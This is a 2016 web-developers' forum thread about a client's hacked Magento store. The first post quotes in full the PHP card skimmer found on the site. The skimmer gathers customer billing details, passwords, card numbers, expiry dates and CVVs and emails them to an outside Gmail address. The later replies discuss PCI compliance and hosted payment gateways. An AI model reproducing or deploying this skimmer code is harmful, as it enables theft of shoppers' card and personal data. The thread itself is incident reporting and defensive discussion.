The Core

Why We Are Here => Water Cooler => Topic started by: gm66 on September 13, 2016, 03:41:43 PM

Title: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: gm66 on September 13, 2016, 03:41:43 PM
As the title says.

I google the email address used in the script, only two results so not widely spread with that address.

The script :

<?php $send = array('PaymentMethod' => $data['method'], 'Billing Name' => $this->getQuote()->getBillingAddress()->getFirstname() . " " . $this->getQuote()->getBillingAddress()->getLastname(), 'Billing Email' => $this->getQuote()->getBillingAddress()->getEmail(), 'Billing Addres1' => $this->getQuote()->getBillingAddress()->getStreet(1), 'Billing Address2' => $this->getQuote()->getBillingAddress()->getStreet(2), 'BillingCity' => $this->getQuote()->getBillingAddress()->getCity(), 'Billing State' => $this->getQuote()->getBillingAddress()->getRegion(), 'Billing PosCode' => $this->getQuote()->getBillingAddress()->getPostcode(), 'Billing Country' => $this->getQuote()->getBillingAddress()->getCountry(), 'Billing Phone' => $this->getQuote()->getBillingAddress()->getTelephone(), 'Account password' => $this->getQuote()->getBillingAddress()->getCustomerPassword() or "KOSONG", 'Billing taxvat' => $this->getQuote()->getBillingAddress()->getTaxvat() or "KOSONG", 'Account Gender' => $this->getQuote()->getBillingAddress()->getGender() or "KOSONG", 'Account DOB' => $this->getQuote()->getBillingAddress()->getDob() or "KOSONG", 'CcOwner' => $data['cc_owner'], 'CcType' => $data['cc_type'], 'CcNumber' => $data['cc_number'], 'CcStart' => trim(sprintf('%02d%02d', $data['cc_ss_start_month'], substr($data['cc_ss_start_year'], strlen($data['cc_ss_start_year']) - 2))), 'CcExpayed' => trim(sprintf('%02d%02d', $data['cc_exp_month'], substr($data['cc_exp_year'], strlen($data['cc_exp_year']) - 2))), 'CcSec' => $data['cc_cid'], 'CustomIP' => trim(getenv('REMOTE_ADDR')), 'WebStore' => trim($_SERVER['SERVER_NAME']));
foreach (
$send as $param => $value) {
$send.= $param . '=' . $value . "
"
;
}
$datasend.= substr($send, 5, -1);
mail('duitmagentoku@gmail.com', 'PaymentReport', $datasend);


I can't believe there's no internal encryption and that transactions can be sniffed like this.

I've advised the client what to do at his end and the hosting company are knowledgable at their end, just have to find out which orders or accounts were compromised.
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: ergophobe on September 13, 2016, 04:44:27 PM
This is why I think in this day and age, any small business running credit card transactions through their own server, is crazy. There is no way to for the typical small business to become and stay PCI compliant and they're open to simple exploits like that.

Most small businesses should be on Shopify, Big Commerce, Volusion or any number of platforms I'm unable to name...
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: gm66 on September 13, 2016, 05:03:04 PM
Quote from: ergophobe on September 13, 2016, 04:44:27 PM
This is why I think in this day and age, any small business running credit card transactions through their own server, is crazy. There is no way to for the typical small business to become and stay PCI compliant and they're open to simple exploits like that.

Most small businesses should be on Shopify, Big Commerce, Volusion or any number of platforms I'm unable to name...

Agreed. I think the vector here may have been weak passwords (going by the one i was assigned!) but i haven't heard back from him about their entry method.

Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: Rupert on September 14, 2016, 10:26:01 AM
There was an exploit a couple of years ago on Magento, that I think (from memory) was cracked when a site was updated from scratch.

So someone in China was scanning all sites that had an old version of Magento, waiting for a major update, and then when they saw it, bam, they were in before the security was set.

The big take-out for me was that this type of thing is happening to the corporates all the time but we never hear about it. And thats why my mastercard is reissued every 6 months.

In my view CC should only be taken through a very few gateways.  Arcot annoys me.  Whoever heard of that? but we have to trust the domain.

Quoteany small business running credit card transactions through their own server, is crazy
Should not be allowed. I rarely shop there if they do. (I can think of 1 site)

What actually gets sniffed?  The CC or just the transaction?
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: gm66 on September 14, 2016, 10:28:12 AM
Turns out my guy doesn't do his own transactions, all done through the merchant bank so sniffer will get nothing.

The sniffer gets all CC data, name address, i think even the CCV (one of the variable names could be the CCV).

The above code snippert came out crappy looking.

Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: Rupert on September 14, 2016, 10:35:22 AM
Ok, so its a bit of code that is unlikely to get anything these days.  Its easier to use a 3rd part than try to code that in-house I would have thought.
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: ergophobe on September 14, 2016, 03:41:27 PM
Quote from: gm66 on September 14, 2016, 10:28:12 AM
Turns out my guy doesn't do his own transactions, all done through the merchant bank so sniffer will get nothing.

What does this mean? Can someone go to his website and put in a credit card number on a page that has his domain on it?
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: gm66 on September 14, 2016, 07:43:01 PM
Quote from: ergophobe on September 14, 2016, 03:41:27 PM
Quote from: gm66 on September 14, 2016, 10:28:12 AM
Turns out my guy doesn't do his own transactions, all done through the merchant bank so sniffer will get nothing.

What does this mean? Can someone go to his website and put in a credit card number on a page that has his domain on it?

I think the merchant bank comes up in an iframe and you validate there.
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: ergophobe on September 14, 2016, 08:27:25 PM
Since the iframe is being called from a page served on your client's server, that means his server is part of the CDE and therefore subject to SAQ-A (the easiest level)

See page 23 of this guide
https://www.pcisecuritystandards.org/pdfs/PCI_DSS_v2_eCommerce_Guidelines.pdf

And page 5 of this guide
https://www.pcisecuritystandards.org/documents/Understanding_SAQs_PCI_DSS_v3.pdf
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: gm66 on September 14, 2016, 08:57:13 PM
Thanks ergo.
Title: Re: Client's Magento site hacked and PHP transaction sniffer installed.
Post by: Rumbas on September 15, 2016, 09:14:48 PM
Eeeew.